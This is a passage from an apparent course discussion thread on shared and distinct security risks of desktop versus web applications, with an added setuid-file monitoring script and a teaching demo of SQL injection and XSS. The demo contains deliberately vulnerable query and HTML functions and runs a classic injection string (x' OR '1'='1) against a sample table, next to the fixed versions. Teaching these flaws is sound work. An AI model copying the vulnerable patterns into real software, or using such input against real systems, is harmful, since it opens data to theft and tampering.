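"""Inventory setuid/setgid files under a tree and diff them against a baseline.

Added example, not part of the SANS reading or the original post. The
baseline format (one absolute path per line, '#' comments allowed) is an
assumption made here for the demonstration.
"""
import os
import stat
from pathlib import Path


def is_setuid_or_setgid(mode: int) -> bool:
    """True if the mode bits carry setuid or setgid."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_privileged_files(root: str) -> dict[str, str]:
    """Walk `root` and return {path: 'u' | 'g' | 'ug'} for regular files with
    setuid and/or setgid set. Symlinks are not followed and unreadable
    entries are skipped, as a monitoring job on a live host would do."""
    found: dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not is_setuid_or_setgid(st.st_mode):
                continue
            flags = ""
            if st.st_mode & stat.S_ISUID:
                flags += "u"
            if st.st_mode & stat.S_ISGID:
                flags += "g"
            found[path] = flags
    return found


def load_baseline(text: str) -> set[str]:
    """Parse a baseline: one path per line; blank lines and '#' comments ignored."""
    return {line.strip() for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")}


def diff_against_baseline(found: dict[str, str], baseline: set[str]) -> dict[str, list[str]]:
    """Paths that appeared since the baseline ('new') and paths that vanished ('missing').
    A 'new' entry is the one a threat hunter wants to look at first."""
    current = set(found)
    return {"new": sorted(current - baseline), "missing": sorted(baseline - current)}


if __name__ == "__main__":
    import tempfile
    # Constructed demonstration: one setuid file and one plain file in a temp tree
    with tempfile.TemporaryDirectory() as tmp:
        bindir = Path(tmp) / "bin"
        bindir.mkdir()
        (bindir / "helper").write_bytes(b"#!/bin/sh\n")
        os.chmod(bindir / "helper", 0o4755)          # setuid bit set
        (bindir / "plain").write_bytes(b"#!/bin/sh\n")
        os.chmod(bindir / "plain", 0o755)            # no privilege bits
        baseline = load_baseline("# known-good privileged files\n")  # empty baseline
        print(diff_against_baseline(find_privileged_files(tmp), baseline))
```

On a real host the root would be `/` and the baseline would be captured once from a clean build, then re-checked on a schedule.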
Kelly Sharadin says
Hi Miray,
I like your proactive approach for monitoring desktop applications via setuid and setgid for malicious activity. This is an area I like to use to form my threat hunting hypotheses for potential known bad in a client’s environment. Applications unnecessarily modifying permissions or scheduling processes can be an indicator of malware. Nice post.
Kelly
Victoria Zak says
Miray,
I agree desktop applications should be evaluated to analyze risks. For instance, a risk within a desktop application could be an improper authorization such as the least privilege approach. So many administrators who have this level of access take advantage. This can be a risk because you can gain access to a critical database or system exclusively.
Kelly Sharadin says
Both desktop and web-based applications are vulnerable to injection-based attacks, for instance rootkits and bootkits for desktop apps, and SQL injections for web apps. What makes each type of application unique is the underlying frameworks, which present their own risks, i.e., scale of impact and code-specific vulnerabilities. Web-based apps have the potential to impact a large scope of users based upon one attack, whereas desktop app attacks can be a more isolated incident targeting a single domain or user.
Victoria Zak says
Kelly,
SQL injections are a very serious risk. If a SQL injection attack was successful, it can result in confidential data being deleted, lost or stolen. However, other desktop application risks include insufficient logging & monitoring, components with known vulnerabilities (outdated software), poor code quality, and improper cryptography (weak keys).
Mohammed Syed says
Basically, desktop applications are installed on a single computer (laptop or desktop) to perform a specific task, while web applications usually follow a client-server architecture and are used via a web browser on client computers; because of that, web applications are getting widely popular. Desktop and web applications are popular as per the situation and network requirements, and both kinds of application have the following common and different risks.
Both applications face many common types of risk, such as input validation: it allows an attacker to inject malicious code into an input field, so the application can crash or give an entry point to the attacker.
Generally, web applications face the cross-site scripting (XSS) risk, but desktop applications do not, because XSS is launched by modifying web URLs, and desktop applications are safe from that since they are accessible from the local system only.
Web applications require internet connectivity, so they face more risk from all over the internet; desktop applications used on a local system face limited risk.
Desktop applications have total control from a single computer, whereas web applications are open to a large number of computers, locations and users. A web-based application is accessible from remote locations, so many risks are generated when data travels through cables, switches and routers to get from client to server; it faces sniffing, hijacking and MITM attacks, but desktop applications are protected from these risks.
Wilmer Monsalve says
Hi Mohammed, I do agree that desktop applications do have total control as opposed to a web application being accessible from remote locations and this does pose more of a risk given that packet sniffing can occur since there is more room for human error when not accessing from a personal computer.
Dhaval Patel says
Hi Mohammed,
Great points. As you said both applications face many types of risk, but it does seem web applications are more vulnerable with the number of scripting attacks and injections that can be performed. Localized applications face a number of attacks as well but to me, they are more difficult to conduct.
Wilmer Monsalve says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Some common and shared risks that web-based applications and desktop applications face are commonly any bugs that could affect the performance of the application and/or security. Another example that they face is any malicious software that can run on the backend when using a web application or a desktop application. The only difference is that desktop applications utilize the computer’s resources in terms of data storage on its hardware instead of an internet connection like a web-based application. This may be a better and more secure approach, as a web-based application has more chances of coming across or being targeted because it is on a network that a hacker can break through, whereas a desktop application can run without an internet connection; it only needs the computer itself.
Jason Burwell says
Hello Wilmer,
Good point about the web-based applications being targeted more due to being on the network.
Ornella Rhyne says
Hi Wilmer,
You are definitely right with “malicious software that can run on the backend when using both applications”. To me, a common/shared risk will be human error. If for example, a phase was neglected or mistaken then it will have a huge impact on the system. Great point!
Madalyn Stiverson says
Hi Wilmer,
Good point. Web apps are opening themselves up to internet-based attacks, and could be more vulnerable to brute force attacks, DDoS, and SQL injections.
Dhaval Patel says
There are a number of risks associated with web applications such as buffer overflows and SQL injections. Whereas with desktop application viruses and malware are the most common, that’s not to say they don’t exist with web applications, but they are more common in desktop applications. Other desktop application security risks include poor logging and monitoring, OS command injections, and hardcoded data values. Authentication seems to be the most common risk between the two. Poorly implemented session management systems can allow for threat actors to take over accounts.
Michael Jordan says
Dhaval,
I like how you highlighted that different types of code injections affect web applications and desktop applications in different ways (e.g., SQL vs OS-based). It is also important that you mentioned authentication vulnerabilities, because broken access control vulnerabilities have become the most common vector of cyber attack, and I believe this would fall under the category of authentication vulnerabilities.
-Mike
Christopher Clayton says
Common risks for desktop applications are malware, viruses, worms, etc., and web-based application risks are injection attacks, broken access control, authentication, and security misconfiguration. Although the web application is more recent than the desktop app, they’re no less important. Web apps are accessible from any device, anywhere, at any time, are exposed to more security risks than desktop apps, and require more security needs, for example, internet access, users who are not identifiable, and cyber-attacks.
Ornella Rhyne says
Hi Christopher,
Segmenting your network is also a good way for secure coding to avoid all those issues. Humans are the one behind the malware or viruses through misconfiguration like you mentioned in your comment so going through a checklist is time consuming but a good way to make sure you did not miss anything.
Ryan Trapp says
A shared risk between web applications and desktop applications is a buffer overflow attack. This is when an application does not perform adequate size checking on the input data, therefore leading to memory space being overwritten. A risk that is unique to a web-based application is an XML injection attack. This is because this attack is carried out through the XML of a web service. A risk that is unique to desktop applications is malware, due to the applications being installed locally. It leaves the user susceptible for malicious code to be run and installed on their system.
Madalyn Stiverson says
Hi Ryan,
Good examples for risks for both web-based and desktop applications. In addition to the security concern, there’s also an availability concern. Web apps also have more points of failure in terms of service speed considering they’re reliant on the server speed and internet connection. Whereas desktop apps just rely on your local hardware.
Ornella Rhyne says
The common risks faced by desktop applications versus web-based applications are human error. SANS talks about how improper application design can cause access control issues. He also mentioned inadequate input validation. All those are related to human error, and if one phase was neglected during the application process/development, then this can give access to unauthorized users. For example, SANS talked about the vulnerability of SQL injection, in which the attacker is able to modify, delete, or insert data. This is due to improper data validation. Another common risk can be malicious software or a user inputting malicious code.
The difference between a web and a desktop application is that desktop apps are computer programs that do not need an internet connection to be used, while a web application needs an internet connection if you want to use it. Web applications are accessible over the Web and the HTTP protocol, so they present more security challenges than desktop applications. Incorrectly configuring a web application brings malicious attacks or provides bad actors with an easy way to exploit sensitive information, as SANS referred to with SQL injection.
Christopher Clayton says
Hi Ornella. Human error seems to always be a given when it comes to risks whether it be desktop and/or web-based applications. I like the example you brought up from SANS in regards to injection attack where the attacker had access to change data. It is unfortunate that human error continues to be an issue in security data breaches. Even though it is something that we cannot fully avoid, proper steps should always be taken in order to minimize the effect the next time that it occurs.
Victoria Zak says
What are the common/shared risks and what are the different/unique risks faced by desktop applications vs web-based applications?
A web application is software stored on a remote server and run in a web browser. A desktop application is stand-alone software that is installed on a computer. There are a number of risks that could occur on both a web-based application and a desktop application. Easy access can be gained between desktop and web applications. Users can access web applications from any device. Desktop application security risks could be insecure communication or an improper authorization such as a least privilege approach. Web application risks include injection flaws, broken authentication, SQL injection, and security misconfiguration.
However, organizations’ applications are at a higher risk, although firewalls are providing security, according to SANS.
Ornella Rhyne says
Hi Victoria,
I like your post and I would like to add that people are relying so much on firewalls providing security. However, they don’t put too much emphasis on how to properly secure their system. Firewalls are great, but all means of security to avoid breaches are better. For that you should train your users on the do’s and don’ts of the company. Segment your network; physical security is also necessary to block unauthorized people from accessing your building or data server. Great post!
Dan Xu says
Web applications have a slight advantage over desktop applications, but desktop applications are very unlikely to become obsolete. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Updating an application takes a lot of time and effort for desktop applications because it needs to be done on each computer, but web-based applications save time and effort. Web applications face more security risks than desktop applications, and they are open to a large number of users in the Internet community, which expands the threat. Web application development and its maintenance involve higher costs; desktop applications are one-time purchases that do not incur continuous costs. Lack of funding for maintenance can easily prevent teams from following up and maintaining the system in a timely manner, thus creating a new risk.
kofi bonsu says
Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes. One thing all business owners will have to acknowledge and guard themselves against would be the presence of software vulnerabilities and threats to web applications.
A web application is primarily software being kept on a remote server and run in a web browser. A desktop application is simply stand-alone software that is installed on a computer. There are several risks that could happen on both a web-based application and a desktop application. Easy access can be obtained between desktop and web applications. Users can therefore access web applications from any device at all. As a matter of fact, desktop application security risks could be not having strong communication or an improper authorization such as a least privilege approach. Web application risks include injection flaws, broken authentication, SQL injection, and security misconfiguration. Organizations’ applications are deemed to be at a higher risk though firewalls are providing security.
Ryan Trapp says
Kofi,
It is true that web applications can be more difficult to manage due to the larger attack surface. And you are certainly correct that the easy access makes web applications potentially more enticing for companies to develop. The decision needs to be made whether the ubiquity is worth the increased security risk.
Olayinka Lucas says
Hello Kofi, I agree with your position that “Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes.” Access to the internet only creates more vulnerabilities to be compromised by adversaries on the web. However, the onus is on the process owners to ensure that adequate controls are in place to mitigate any attacks that may arise from internet-related activities. Well said.
Michael Duffy says
Both web-based and desktop applications are susceptible to traditional attacks through access control; and injection attacks if neither program has input validation allowing hackers to exploit syntax errors from either program. Where the two differentiate from each other is convenience and the scope of the security varies between vendors. Web-applications also introduce more exploits such as Buffer Overflow, XML Injection, and SQL injection attacks. And although web-based applications are cross-platform and provide a very easy and convenient way for the end user to access the application – it should be noted that platform security is dependent on the vendor that manages the application. Technically, desktop applications can come with similar risks depending on the scope of the system. Since developers sometimes utilize embedded SQL servers within desktop applications depending on the system, but many desktop applications do not require an internet connection which means access is local rather than over the web.
Olayinka Lucas says
Web-based applications are programs you access online, delivered to your device from a remote server when you access it via a browser; they are not installed on your machine. On the other hand, desktop applications are the programs that you download and install on your device. They do not need internet connectivity to be used. Every required functionality is stored on the workstation with little to no reference to the internet except for connectivity. So, the application can be accessed through your desktop.
The common risk they both face is XSS (Cross-Site Scripting) and other malicious attacks that may compromise access to the application.
Web-based applications are the more modern method of delivering applications, while Desktop applications are more traditional.
Web applications are at higher security risks as they are inherently designed to increase accessibility. On the other hand, desktop applications have the better authorization, and administrators have better control, hence more secure. In addition, web applications rely heavily on internet connectivity for their operation, while desktop applications rely solely on user access.
Everything on the internet is more vulnerable to hackers than information left on a device; i.e., cloud storage, for example, is deployed either in the form of SAAS, IAAS or PAAS by the Cloud Service Provider (CSP) without client input. In contrast, desktop storage is solely reliant on the capability of the Data Owner and not the service provider.
Richard Hertz says
• What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Cross-site scripting and SQL injection attacks are common risks in both desktop and web based apps. The 2 applications differ in their construct (browser based vs executing 100% on your local compute platform), but share the vulnerabilities of connecting to and querying back end systems.
The different vulnerabilities come from the different locations where functions are executed in desktop vs web-based apps. The desktop apps are also vulnerable to a host of attacks that can be launched from the local compute platform. Web-based apps tend to be browser based and are more vulnerable to web server based attacks.
Antonio Cozza says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
The most obvious shared risk between desktop and web-based applications is that of access control flaws. Although it is a more general issue with different implications based on the type of access flaw, it is prevalent and poses a significant risk in both types of applications on a large scale. SQL Injection and XSS are primary risks that even make it to the OWASP top 10 list of common web app vulnerabilities. On the other hand, desktop applications are quite susceptible to process hijacking and then privilege escalation or pivoting.
Corey Arana says
Hey Antonio,
Thanks for sharing, the OWASP list is a good piece of information. SQL is definitely a serious risk for the web based apps.
Do you happen to have any examples of a desktop application being hijacked?
Bryan Garrahan says
Desktop and web-based applications are subject to both authentication and access control risks, since both need to be configured to ensure only appropriate users maintain access to the application and each can only perform the functions they are required to perform. Some of the more common desktop application risks include malware/viruses, which can be developed to take advantage of a flaw in the design/configuration of the application and can be propagated across other clients in the network. Web-based applications are typically more vulnerable to remote attacks, such as cross-site scripting (XSS) and SQL injection.
Vraj Patel says
Hello Bryan,
That’s a good explanation of the difference between the web and desktop application. I do agree that web applications are vulnerable to cross-site scripting (XSS) and SQL injection. However, malware and viruses are also a risk to the web application as well, along with the desktop application.
Lauren Deinhardt says
Hi Bryan. Great analysis! I would also argue that SQL injections could impact on-prem applications if the SQL database connects with any web server based databases (same with XML attacks).
Vraj Patel says
The common risk that both desktop applications and web-based applications have is maintaining the application itself. If the application is not patched on time, then it would be vulnerable to the vulnerabilities that the current version might have. The risk that desktop applications have is that they are limited by the hardware resources. If the resources of the system the application is installed on do not meet the performance level accepted by the business, then they might be required to be replaced. Another risk with desktop applications is that they require installation on the desktop by the user. If the application installed by the user has malware in it, then it could introduce risk within the company’s network. The risk with web-based applications is that the user has to have a good internet connection. They also need to be properly configured, as they could be accessible by anyone on the internet.
Kelly Sharadin says
Hi Vraj,
Fantastic post, you did a far better job than me explaining the ease with which an attacker can execute a web-based attack by simply having an internet connection. I agree that desktop apps require an additional level of privilege esc in order to cause considerable damage.
Kelly
Lauren Deinhardt says
Both desktop applications and web-based applications are vulnerable to many application-based risks. Web-based applications are highly privy to buffer overflow attacks, which can lead into DDOS (distributed denial of service) attacks or even malware injections. Due to the on-prem nature of desktop applications (i.e., calculator), this attack can generally be avoided; but when a desktop application connects with web-based servers, the possibility of a buffer overflow attack resurfaces. SQL injections can impact both desktop and web-based applications; the internet is not always required to use MySQL (or other SQL programs, for example), so an attacker can commit a SQL injection on either type of application. A unique risk experienced by web-based applications, however, is XML injection attacks. XML is the exclusive metalanguage used by the internet and is the backbone of web servers. If an XML injection attack were to be successful, this can compromise an entire web-based application or even a web-based database—this would not have the same impacts on a desktop server though.
Michael Duffy says
I actually didn’t think about that about XML when I was making my comment. I wish I actually stated that instead of my other points I made. Anyhow; I like that you pointed out that SQL is sometimes used by desktop applications. I know a lot of developers will embed SQL into the applications to function as servers for a LAN.
Jason Burwell says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Both desktop applications and web based applications have the challenge of being maintained, the risk of unwanted access and security risks.
Some differences are:
Web based: no need to install, not user dependent for updates, easy access, can be accessed from a mobile device, more security risks due to internet exposure.
Application based: does not rely on the internet, stronger privacy and data protection due to not being internet dependent, more hardware dependent as it needs computer resources to run but usually runs faster than web based because of this, unable to be accessed from as many devices as web based.
Madalyn Stiverson says
Desktop application cons
* Desktop apps may be harder to scale when compared to cloud-based alternatives
* There is a lack of communication between computers. Changes you made locally may not reflect on another user’s machine. Meaning collaboration is also more difficult on desktop apps. Users may share files via email or USB, creating a potential security vulnerability.
Web app cons
* You must be connected to the internet, leaving you vulnerable to internet-based attacks. Whereas with desktop apps, you have the opportunity to air gap
* Availability is limited to the service availability. For example, if AWS has an outage, there’s not much you personally can do to get it back up and running
* There are more potential points of failure. Desktop apps only rely on your computer speed, whereas web apps can be affected by server speed and internet speed.
* For desktop apps, you have the opportunity to pursue your own backup solution. However, with web apps you may be forced to use a certain backup solution that’s compatible or supported by that web app.
* For desktop apps, there is no question of ownership. The person on that local computer made that change in the app. However, web app data is not stored locally, but sent to a cloud, so there may be a question of ownership regarding changes or updates to the data.
* Web apps may have an automatic update system in place, which could potentially break compatibility or functionality.
Risks for both
* Security updates are a concern, since not all applications will be supported indefinitely; most applications will hit end of life.
Alexander William Knoll says
Desktop applications & web-based applications have several shared risks, such as poor authentication measures and weak passwords. Regardless of how the application is accessed, weak passwords can be broken if the data is highly desired, and so back-up measures such as two-factor authentication should always be in place. A unique risk that desktop applications face is their high vulnerability to malware invading the system the application is installed on. If a person downloads an untrustworthy application, they may be allowing something onto their computer that can quickly spread across the system & network. Another risk is the application being locked onto a particular device. For example, if you leave work for the day and forget to lock your computer, you are openly leaving all of the information in a specific desktop application open to whoever. On the other hand, web-based applications have their own unique risks, such as SQL injection & cross-site scripting. SQL injection works when an attacker includes a SQL query in an input channel of an application that the user then accesses. Once the malicious SQL query is validated, the attacker is able to access/manipulate database information, such as sensitive company data. Cross-site scripting (XSS) works by exploiting an application to deliver a client-side text string containing malicious JavaScript to a user’s browser, which can have several consequences such as redirecting the user to a malicious website or stealing sensitive cookie information.
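The two web-application risks named in the post above, SQL injection and cross-site scripting, both come down to untrusted input changing the structure of something the application builds (a query, an HTML page). The following is an added example, not code from the discussion or from any project it mentions; it uses Python's built-in sqlite3 and html modules, a constructed in-memory users table, and hypothetical function names (lookup_vulnerable, lookup_safe, render_greeting_vulnerable, render_greeting_safe) to show each weak pattern beside its hardened form.

```python
import html
import sqlite3

# Constructed sample rows for the demo; not taken from any real system.
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
]


def setup_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Weak pattern: the untrusted value is pasted into the SQL text, so
    quote characters in the input can alter the query's logic (SQL injection)."""
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened pattern: a parameterized query. The driver passes the value
    separately from the SQL text, so it is only ever compared as data."""
    query = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def render_greeting_vulnerable(display_name: str) -> str:
    """Weak pattern: untrusted text is interpolated into HTML unescaped,
    which is how an injected script string reaches the user's browser (XSS)."""
    return f"<p>Welcome, {display_name}!</p>"


def render_greeting_safe(display_name: str) -> str:
    """Hardened pattern: escape for the HTML text context before interpolating,
    so angle brackets and quotes render as literal characters, not markup."""
    return f"<p>Welcome, {html.escape(display_name)}!</p>"


if __name__ == "__main__":
    db = setup_db()
    # A single value containing a quote character: the vulnerable lookup
    # returns every row, the parameterized lookup returns none.
    crafted = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, crafted))
    print("safe:      ", lookup_safe(db, crafted))
    # The same comparison for HTML output.
    print(render_greeting_vulnerable("<b>hi</b>"))
    print(render_greeting_safe("<b>hi</b>"))
```

The defensive takeaway is the same in both halves: keep data and structure in separate channels (bind parameters for SQL, context-aware escaping for HTML) rather than trying to filter "bad" characters out of the input. Input validation is still worthwhile, but it is the separation that removes the injection class.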
Corey Arana says
People are the shared risk that both desktop apps and web apps have in common. Because of people, web apps and desktop apps are at risk due to being connected to the internet. Authentication, authorization, exposure of sensitive data and injections are all risks that come with being connected to the internet. Web applications are more at risk than desktop apps in today’s world. Web applications face risks such as login/password theft, security misconfiguration and cross-site scripting. Desktops do have risks such as viruses and malware but are less risky because they do not require the internet to run.
Bryan Garrahan says
I hadn’t considered human risk even though we have discussed various ways humans introduce IT security risk across several units. It’s a great point and I think with the existence and popularity of cloud based services humans are much more vulnerable to web application rather than desktop application risks.
Bernard Antwi says
A desktop application is a type of software that you install directly on your personal computer. You can launch it whenever you want, independently of other applications. They take up space on your hard drive and can work regardless of internet connection. Although some apps need it to function as intended (web browsers like Chrome or Firefox, for example), they are still considered desktop apps since they are installed on your PC, whereas a web-based application is a type of software application that is used through the internet via a web browser. Instead of storing the files on your computer, they are located on a remote server. A web browser allows you to access the app and its content and also runs all the scripts responsible for its features. What differentiates a simple static web page from a web application is interactivity. They often allow you to create, edit, or manipulate data and content.
https://digitalskynet.com/blog/Desktop-App-vs-Web-App-Comparative-Analysis